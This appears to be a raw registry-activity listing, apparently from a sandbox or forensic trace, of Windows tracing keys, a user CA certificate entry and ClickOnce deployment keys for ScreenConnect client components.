HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
{c989bb7a-8385-4715-98cf-a741a8edb823}!ApplicationTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!01000000c375b60a14060000741b00000000000000000000055475cd9428db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
NonCanonicalData
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ApplicationSourceUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsFullTrust
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!IsShellVisible
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PreviousBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!ExcludedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!PendingDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!DeploymentProviderUri
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!MinimumRequiredVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!LastCheckTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkippedDeployment
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!UpdateSkipTime
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!AppType
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
{2ad613da-6fdb-4671-af9e-18ab2e4df4d8}!CurrentBind
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
appid
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
implication!scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_e781b1ee36f7c0e0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_898f6d085da479bc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_ceab8affc7343daa
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_f7f106a5cc529540
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_61230ac9d37a71e2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_12d9d3044e990931\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe_0e21f87bfcff26be
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_fc1d7bd48553fcab
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\Files
ScreenConnect.ClientService.dll_e781b1c636f7bfae
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\Files
ScreenConnect.Core.dll_b96889d378047e27
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
SizeOfStronglyNamedComponent
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
DigestValue
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
Transform
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
DigestMethod
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\Files
ScreenConnect.WindowsClient.exe_6492277df2db17d2
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
OnlineAppQuotaUsageEstimate
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!100000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!0e0000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!0c0000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!0a0000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!080000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!060000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!040000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
identity
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
PreparedForExecution
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
lock!110000001432d00a14060000741b00000000000000000000616e13bb9828db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\Files
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
